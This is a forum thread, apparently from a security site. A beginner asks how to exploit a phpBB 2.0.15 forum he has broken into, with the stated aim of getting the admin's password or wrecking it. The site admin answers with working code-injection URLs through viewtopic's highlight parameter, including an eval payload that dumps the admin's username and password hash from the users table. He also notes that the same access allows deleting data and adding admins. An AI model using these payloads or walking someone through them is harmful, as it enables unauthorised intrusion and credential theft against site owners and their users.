Waraxe Forums

Yata · Beginner

Ok so Im a noob here, I was running some exploits for php 2.0.15 on a forum through the cmd both perl and python. I managed to use this script 'http://downloads.securityfocus.com/vulnerabilities/exploits/phpbb2_0_15.pl' but once running it I have no idea if there is a way to use it to get the admins user or pass or wreck any havok
Similary with this script 'http://milw0rm.com/id.php?id=1080' which gives me the details '
database host: localhost
database name: xxxx_forums2
username: xxxxx
password: xxxxx

only replace the x's with the actual data I got, is there any way to use this to my advantage considering i dont have admin access to gain it? If anyone helps me I will be thankfull but due to the insulting nature of me not knowning this information already I understand if no-one does.
Thanks.

waraxe · Site admin

It seems, that you can execute arbitrary php code in victim's webserver. Try this for beginning:

http://localhost/phpbb.2.0.15/viewtopic.php?t=1&highlight='.phpinfo().'

Of course, first modify this url to suit your specific conditions.

If you will get result of the "phpinfo()" function, then it is not hard to manipulate the database - delete something, add new admins, steal password hashes, etc.

Yata · Beginner

it does indeed let me use that code and displays all sorts of php information. Not being a wizard in php I have no idea how to use this to a way or find the right code to do anything malicous.

waraxe · Site admin

OK, i was running some tests on my own local phpbb 2.0.15 installation and this is one useful info stealing method:

http://localhost/phpbb.2.0.15/viewtopic.php?t=1&highlight='.eval(stripslashes($_GET[kala])).'&kala=$s='SELECT+*+FROM+phpbb_users+WHERE+user_id=2';$r=$db-%3Esql_query($s);$u=$db-%3Esql_fetchrow($r);var_dump($u);

If database prefix is "phpbb_" and admin's ID is 2, then you will see admin's username, password md5 hash and other info. Change ID, if needed.